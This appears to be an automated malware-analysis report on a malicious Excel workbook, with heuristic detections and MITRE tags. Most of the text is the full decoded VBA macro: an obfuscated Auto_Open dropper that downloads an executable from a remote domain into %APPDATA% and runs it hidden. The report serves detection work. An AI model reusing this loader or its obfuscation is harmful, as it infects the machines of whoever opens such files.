MALICIOUS
376
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample is an Excel document containing an Auto_Open VBA macro. This macro is designed to download a file from 'http://www.dilibuildcon.co.in/usr/osos.exe' and save it as 'Super.exe' in the user's application data directory. It then executes the downloaded file using ShellExecute. The presence of obfuscated code and the direct execution of a downloaded payload indicate malicious intent.
Heuristics 10
-
ClamAV: Xls.Malware.Valyria-10008065-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Valyria-10008065-0
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
Call N1Oq.write(jgP8u.responseBody) -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Call ShellExecute(Environ("appdata") & "\Super.exe", vbHide) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set jgP8u = CreateObject(Chr$(77) & Chr$(105) & Chr$(99) & Chr$(114) & Chr$(111) & Chr$(115) & Chr$(111) & Chr$(102) & Chr$(116) & Chr$(46) & Chr$(88) & Chr$(77) & Chr$(76) & Chr$(72) & Chr$(84) & Chr$(84) & Chr$(80)) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() 'now only one link will be downloaded and saved with name java12.exe and then java12.exe will be executed -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
If DownloadFile(Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(119) & Chr(119) & Chr(119) & Chr(46) & Chr(100) & Chr(105) & Chr(108) & Chr(105) & Chr(112) & Chr(98) & Chr(117) & Chr(105) & Chr(108) & Chr(100) & Chr(99) & Chr(111) & Chr(110) & Chr(46) & Chr(99) & Chr(111) & Chr(46) & Chr(105) & Chr(110) & Chr(47) & Chr(117) & Chr(115) & Chr(114) & Chr(47) & Chr(111) & Chr(115) & Chr(111) & Chr(115) & Chr(46) & Chr(101) & Chr(120) & Chr(101), Environ("appdata") & "\ … -
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
-
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10949 bytes |
SHA-256: 9be2cf4d19b758edb54a6d43a584eb07792062bd057cae2a73f2b42170457b12 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
149 of 218 identifiers look randomly generated (e.g. 'lBQYajGBfhNTnvlQLLKP') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
'Begin Code
'Unload Me bro if u want to change icon go to here .
Sub Auto_Open() 'now only one link will be downloaded and saved with name java12.exe and then java12.exe will be executed
Dim EOuVC As Integer
If DownloadFile(Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(119) & Chr(119) & Chr(119) & Chr(46) & Chr(100) & Chr(105) & Chr(108) & Chr(105) & Chr(112) & Chr(98) & Chr(117) & Chr(105) & Chr(108) & Chr(100) & Chr(99) & Chr(111) & Chr(110) & Chr(46) & Chr(99) & Chr(111) & Chr(46) & Chr(105) & Chr(110) & Chr(47) & Chr(117) & Chr(115) & Chr(114) & Chr(47) & Chr(111) & Chr(115) & Chr(111) & Chr(115) & Chr(46) & Chr(101) & Chr(120) & Chr(101), Environ("appdata") & "\Super.exe") = True Then
Dim number As Integer
number = 1
Dim sampleString As String
' Evaluate number and branch to appropriate label.
If number = 1 Then GoTo Line1 Else GoTo Line2
Line1:
sampleString = "Number equals 1"
GoTo LastLine
Line2:
' The following statement never gets executed because number = 1.
sampleString = "Number equals 2"
LastLine:
' Write "Number equals 1" in the Debug window.
Call ShellExecute(Environ("appdata") & "\Super.exe", vbHide)
End If
End Sub
Public Function k9LWXV0s(TV9tLUV As String, jx68LS As String) As String
Dim QLnhigm As Integer
Dim hpIed As Integer
Dim EsiLk As Integer
For EsiLk = 1 To Len(jx68LS)
GoTo cjDLA
cjDLA:
GoTo axsVQDKdlbGBCAFqxEU:
ftOCMkfIJqKPYNtCCB:
ahoSgfvyBtRhaJsuOr = "JGpCc"
GoTo dkrVjiyBEwUkdMvx
QJtbeybftDZmZLn:
EHzYngPyAUxCPavIwi = "gfGoFrvV"
GoTo HkRjUcCcnhzwTpNGC
vVsFTBSEIiQTNgdzV:
QLnhigm = QLnhigm + Asc(Mid$(jx68LS, EsiLk, 1))
GoTo AwHLavxGQKoEQr
jSekgrIJfgqNuYoTbu:
GBSQnIhaVhyMjVgDy = "dJMUKqzzy"
GoTo rQRSQVHAHmMyNRUL
NtdZNiYOdnVV:
QSfiwRTdniLbtNhbQwFF = "JunuZml"
GoTo vVsFTBSEIiQTNgdzV
QFFssTcpQkPoFRFDxP:
ahoSgfvyBtRhaJsuOr = "JGpCc"
GoTo jSekgrIJfgqNuYoTbu
EuajjimYQYCOOeild:
QSfiwRTdniLbtNhbQwFF = "JunuZml"
GoTo QJtbeybftDZmZLn
rQRSQVHAHmMyNRUL:
EHzYngPyAUxCPavIwi = "gfGoFrvV"
GoTo NtdZNiYOdnVV
dkrVjiyBEwUkdMvx:
DLYATzYpPpAuMwS = "NTPbsGO"
GoTo vLBEvUxcaIwRHy
AwHLavxGQKoEQr:
GoTo EuajjimYQYCOOeild
axsVQDKdlbGBCAFqxEU:
DLYATzYpPpAuMwS = "NTPbsGO"
GoTo QFFssTcpQkPoFRFDxP
HkRjUcCcnhzwTpNGC:
GBSQnIhaVhyMjVgDy = "dJMUKqzzy"
GoTo ftOCMkfIJqKPYNtCCB
vLBEvUxcaIwRHy:
Next EsiLk
For EsiLk = 1 To Len(TV9tLUV)
GoTo ZWm
ZWm:
GoTo zZzKEQFdMQd:
pxbonDHJBbqiSA:
VJSqlOQxQQfTzIJHMk = "ycpoE"
GoTo QzESdxKylLihJqHu
RIVgOOCCdm:
vjUwSRtbsfjIjuoG = "awUMIUl"
GoTo buaxPcPNHZQtdnt
BSTpqzQEixekD:
eYqnJfEJGRUkFGP = "UyhATODjstr"
GoTo QwrsqvgZgK
zZzKEQFdMQd:
KCcrjTBDZBFTPyMlmMV = "KeI"
GoTo HOfFEUKNFeHmkRG
QnrtlKnRCxmG:
GoTo oBMvuiTvResardh
buaxPcPNHZQtdnt:
hahLZYosumLbSDlnH = "pCN"
GoTo BSTpqzQEixekD
HOfFEUKNFeHmkRG:
VJSqlOQxQQfTzIJHMk = "ycpoE"
GoTo RIVgOOCCdm
QwrsqvgZgK:
hpIed = Asc(Mid$(TV9tLUV, EsiLk, 1)) - QLnhigm - EsiLk
GoTo QnrtlKnRCxmG
oBMvuiTvResardh:
eYqnJfEJGRUkFGP = "UyhATODjstr"
GoTo vtnFCZvTZVhkzUVfp
NdwPjeSyHIGL:
vjUwSRtbsfjIjuoG = "awUMIUl"
GoTo pxbonDHJBbqiSA
vtnFCZvTZVhkzUVfp:
hahLZYosumLbSDlnH = "pCN"
GoTo NdwPjeSyHIGL
QzESdxKylLihJqHu:
KCcrjTBDZBFTPyMlmMV = "KeI"
GoTo lBQYajGBfhNTnvlQLLKP
lBQYajGBfhNTnvlQLLKP:
Do Until hpIed > 0
GoTo QgW
QgW:
GoTo PwCVeTzuvtyjckN:
CYZjsnQgzTmh:
lxatZwOoOaTmUsc = "soAQ"
GoTo CKLJOztAerqGKNEetmVD
FPyylYyUiwduh:
YYoegYxaECkZtkboz = "hUU"
GoTo KywqIFcyQdZk
DgzfDUuUgascy:
YYoegYxaECkZtkboz = "hUU"
GoTo tzvGYmuvFdY
bDHVgAOBoOlkMtLx:
hpIed = 255 + hpIed
GoTo bBMGZVsOnfbnESo
tzvGYmuvFdY:
EQtMsPiuigaspLvGL = "TlmHIRqQ"
GoTo aquwoNqUFBpKA
CKLJOztAerqGKNEetmVD:
YZQczGNrEDTYbRrGyjQ = "oQUjfNcBB"
GoTo bDHVgAOBoOlkMtLx
PwCVeTzuvtyjckN:
EQtMsPiuigaspLvGL = "TlmHIRqQ"
GoTo FPyylYyUiwduh
uQbpmUiHHj:
rsBaTxzgmFNDjefd = "Sah"
GoTo DgzfDUuUgascy
bBMGZVsOnfbnESo:
GoTo lIDhjPkpxn
lIDhjPkpxn:
YZQczGNrEDTYbRrGyjQ = "oQUjfNcBB"
GoTo ccafCJQvHHQbeVxMFpQ
ccafCJQvHHQbeVxMFpQ:
lxatZwOoOaTmUsc = "soAQ"
GoTo uQbpmUiHHj
KywqIFcyQdZk:
rsBaTxzgmFNDjefd = "Sah"
GoTo CYZjsnQgzTmh
aquwoNqUFBpKA:
Loop
GoTo vW
vW:
GoTo cKMhJNcmHUHuV:
ZwdGQDJdlaFBBAEqjq:
ykoNCztLIfBagcn = "Fbdmv"
GoTo vhwADvTxcLHwQGxLVii
LTJpkljoagnEfe:
GoTo kneDgLJrgAqhvF
hmIPQBONehk:
dtxArQtZIEtNDuISB = "obBYlz"
GoTo APIsbdxafs
tmitKZuisPKopVqvDtZi:
ykoNCztLIfBagcn = "Fbdmv"
GoTo hmIPQBONehk
APIsbdxafs:
PLQopKLVtaDSzGZhQCx = "wBngnQ"
GoTo YlKKmuHjCiGYy
vhwADvTxcLHwQGxLVii:
QnFatndIRRQVGzGly = "NQTLkz"
GoTo qSARDHiHSMfcz
obbCKYzTyQoAp:
PLQopKLVtaDSzGZhQCx = "wBngnQ"
GoTo gyvRBMSOarsN
YlKKmuHjCiGYy:
xnesCllYYzHUwPv = "lxljdvsOy"
GoTo kevfBlwCyJbqxyIgbEGm
kevfBlwCyJbqxyIgbEGm:
k9LWXV0s = k9LWXV0s & Chr(hpIed)
GoTo LTJpkljoagnEfe
gyvRBMSOarsN:
dtxArQtZIEtNDuISB = "obBYlz"
GoTo ZwdGQDJdlaFBBAEqjq
kneDgLJrgAqhvF:
xnesCllYYzHUwPv = "lxljdvsOy"
GoTo obbCKYzTyQoAp
cKMhJNcmHUHuV:
QnFatndIRRQVGzGly = "NQTLkz"
GoTo tmitKZuisPKopVqvDtZi
qSARDHiHSMfcz:
Next EsiLk
End Function
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module2"
Function Area(x As Double, y As Double) As Double
Area = x * y
End Function
Function DownloadFile(sUrl As String, sDropTo As String) As Boolean
Dim jgP8u As Object
Dim N1Oq As Object
On Error GoTo ErrHandle:
GoTo cqdPqMLoUmZdCdoiA:
cqdPqMLoUmZdCdoiA:
GoTo mfP
mfP:
xdmnlqbUcFSRimogFUM = "fhCfjx"
GoTo LQZOuCDBGelsV
zNJsGggGPcEYDb:
ktRycrYexFvbVQUa = "DKpPBRVY"
GoTo StEyQAQGQQSfwK
ixSTeniLbuO:
Call N1Oq.Close
GoTo cQwFGEJuovZ
LQZOuCDBGelsV:
hDayEALOezAJTOsH = "uN"
GoTo iyCFwVleNvyS
iyCFwVleNvyS:
pRwhcQlcSgraZMyawIQ = "VIMmaYR"
GoTo zNJsGggGPcEYDb
CQbvJwjJgfHoGsw:
ktRycrYexFvbVQUa = "DKpPBRVY"
GoTo wHBTQnJiaViyNjQgDyce
StEyQAQGQQSfwK:
PaJIwwYgsUoTrJVJHB = "QnQinkvMN"
GoTo nwUOsubhAIye
fksiNVQUaxELqCCRV:
hDayEALOezAJTOsH = "uN"
GoTo PpExhORmOShdMazzbjvY
AwkEvmAKtsgStPcrYpc:
Call N1Oq.write(jgP8u.responseBody)
GoTo FtrlDAQtRYT
nwUOsubhAIye:
Set jgP8u = CreateObject(Chr$(77) & Chr$(105) & Chr$(99) & Chr$(114) & Chr$(111) & Chr$(115) & Chr$(111) & Chr$(102) & Chr$(116) & Chr$(46) & Chr$(88) & Chr$(77) & Chr$(76) & Chr$(72) & Chr$(84) & Chr$(84) & Chr$(80))
GoTo aYdNUcsSSiZbSsUzxfTo
VjudcPPrzLo:
Call jgP8u.Open(Chr$(71) & Chr$(69) & Chr$(84), sUrl, 0)
GoTo nKdpdbUnkGqBGDOgh
nKdpdbUnkGqBGDOgh:
GoTo HUItV
HUItV:
Call jgP8u.Send
GoTo DMlRvKrxQZOupqot
wHBTQnJiaViyNjQgDyce:
pRwhcQlcSgraZMyawIQ = "VIMmaYR"
GoTo fksiNVQUaxELqCCRV
PpExhORmOShdMazzbjvY:
xdmnlqbUcFSRimogFUM = "fhCfjx"
GoTo TqOGCOfuPDMkfIK
aYdNUcsSSiZbSsUzxfTo:
Set N1Oq = CreateObject(Chr$(65) & Chr$(100) & Chr$(111) & Chr$(100) & Chr$(98) & Chr$(46) & Chr$(83) & Chr$(116) & Chr$(114) & Chr$(101) & Chr$(97) & Chr$(109))
GoTo VjudcPPrzLo
DMlRvKrxQZOupqot:
N1Oq.Type = 1
GoTo QfIkUlprjIl
lBFIzZogQyAV:
PaJIwwYgsUoTrJVJHB = "QnQinkvMN"
GoTo CQbvJwjJgfHoGsw
FtrlDAQtRYT:
Call N1Oq.SaveToFile(sDropTo, 2)
GoTo ixSTeniLbuO
cQwFGEJuovZ:
GoTo lBFIzZogQyAV
QfIkUlprjIl:
Call N1Oq.Open
GoTo AwkEvmAKtsgStPcrYpc
qSARD:
GoTo vyBtShaKsuO:
qNImoUbuCrQ:
GoTo SRQHNVmMLcRUMlOtrZN
pQlPoGgGRL:
Exit Function
GoTo MkTekgsIYf
pPqBvNKhCcTP:
DmmaLnJVkRjUZznke = "uQmKQM"
GoTo sHdQaxsVYE
embGPQOTrxEjwvLPRJjy:
dbUnkGqBGDOghCDM = "RvKxQZOu"
GoTo Bbmg
Bbmg:
GoTo bIKfHMaQFSssT
MkTekgsIYf:
ErrHandle:
GoTo qNImoUbuCrQ
SRQHNVmMLcRUMlOtrZN:
dNUcsSSiZbSsUzxfTofV = "udcPrzLoHnKd"
GoTo ZOdnVVIJktF
TqOGCOfuPDMkfIK:
DownloadFile = True
GoTo qSARD
lrKSHojjinYQYCdO:
cqMNQhcFUnHbUKqzAyDo = "oSg"
GoTo NFBNd
NFBNd:
GoTo wJTpCqcDaZAiz
BgEQjQTNgdA:
qoteQfIkUlprjIlP = "peypg"
GoTo uAwIZavxGeLp
sHdQaxsVYE:
qoteQfIkUlprjIlP = "peypg"
GoTo embGPQOTrxEjwvLPRJjy
vyBtShaKsuO:
cqMNQhcFUnHbUKqzAyDo = "oSg"
GoTo HuFcX
HuFcX:
GoTo pPqBvNKhCcTP
uAwIZavxGeLp:
DmmaLnJVkRjUZznke = "uQmKQM"
GoTo lrKSHojjinYQYCdO
GoTo Ci
Ci:
ZOdnVVIJktF:
dbUnkGqBGDOghCDM = "RvKxQZOu"
GoTo IQ
IQ:
GoTo BgEQjQTNgdA
bIKfHMaQFSssT:
dNUcsSSiZbSsUzxfTofV = "udcPrzLoHnKd"
GoTo pQlPoGgGRL
wJTpCqcDaZAiz:
DownloadFile = False
End Function
Public Function ShellExecute(ByVal RPVDuDd As String, ByVal yLPTJ As VbAppWinStyle) As Boolean
On Error GoTo ErrHandle
GoTo Achy
Achy:
GoTo OidRxGHFKvpwan:
MrDDSQaQqFyiPSnP:
bZeOVdtTTjacTtV = "ygUpgQ"
GoTo ieNbAAbkqRmQpHhHSMf
CURoKjbQjzOkYhEzd:
ENmSwLsyRaPvqrpufY = "JlV"
GoTo LgltjOQYVby
lfxvRnLRNadrM:
qskJmQBxlFwnBLut = "TuQ"
GoTo YidGVoIcVLrABzEpip
OidRxGHFKvpwan:
rZqdhGusmEBYuSZ = "gjyTUfojMc"
GoTo RcwKxkKhgIpHtxQx
LgltjOQYVby:
vedQQsAMpIoLeqec = "olHrCHEPhi"
GoTo MrDDSQaQqFyiPSnP
MoKQlSkVaA:
ENmSwLsyRaPvqrpufY = "JlV"
GoTo lfxvRnLRNadrM
PusaOjZPeoQQ:
ErrHandle:
GoTo KluGjChFYjYUOheBl
RcwKxkKhgIpHtxQx:
qskJmQBxlFwnBLut = "TuQ"
GoTo CURoKjbQjzOkYhEzd
KuqfzqhuEnn:
vedQQsAMpIoLeqec = "olHrCHEPhi"
GoTo MoKQlSkVaA
BxJabwyHfMpFms:
GoTo TIpkkjoZRZDePgjmeC
TIpkkjoZRZDePgjmeC:
bZeOVdtTTjacTtV = "ygUpgQ"
GoTo KuqfzqhuEnn
ieNbAAbkqRmQpHhHSMf:
Call CreateObject(Chr$(83) & Chr$(104) & Chr$(101) & Chr$(108) & Chr$(108) & Chr$(46) & Chr$(65) & Chr$(112) & Chr$(112) & Chr$(108) & Chr$(105) & Chr$(99) & Chr$(97) & Chr$(116) & Chr$(105) & Chr$(111) & Chr$(110)).ShellExecute(RPVDuDd, vbNullString, vbNullString, vbNullString, yLPTJ)
GoTo lUflhtJZgirOJnpVcv
KluGjChFYjYUOheBl:
ShellExecute = False
GoTo BxJabwyHfMpFms
lUflhtJZgirOJnpVcv:
ShellExecute = True
GoTo sYTTSYIOQnNMdSVN
sYTTSYIOQnNMdSVN:
Exit Function
GoTo PusaOjZPeoQQ
YidGVoIcVLrABzEpip:
rZqdhGusmEBYuSZ = "gjyTUfojMc"
GoTo CGJAaphRzBQz
CGJAaphRzBQz:
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.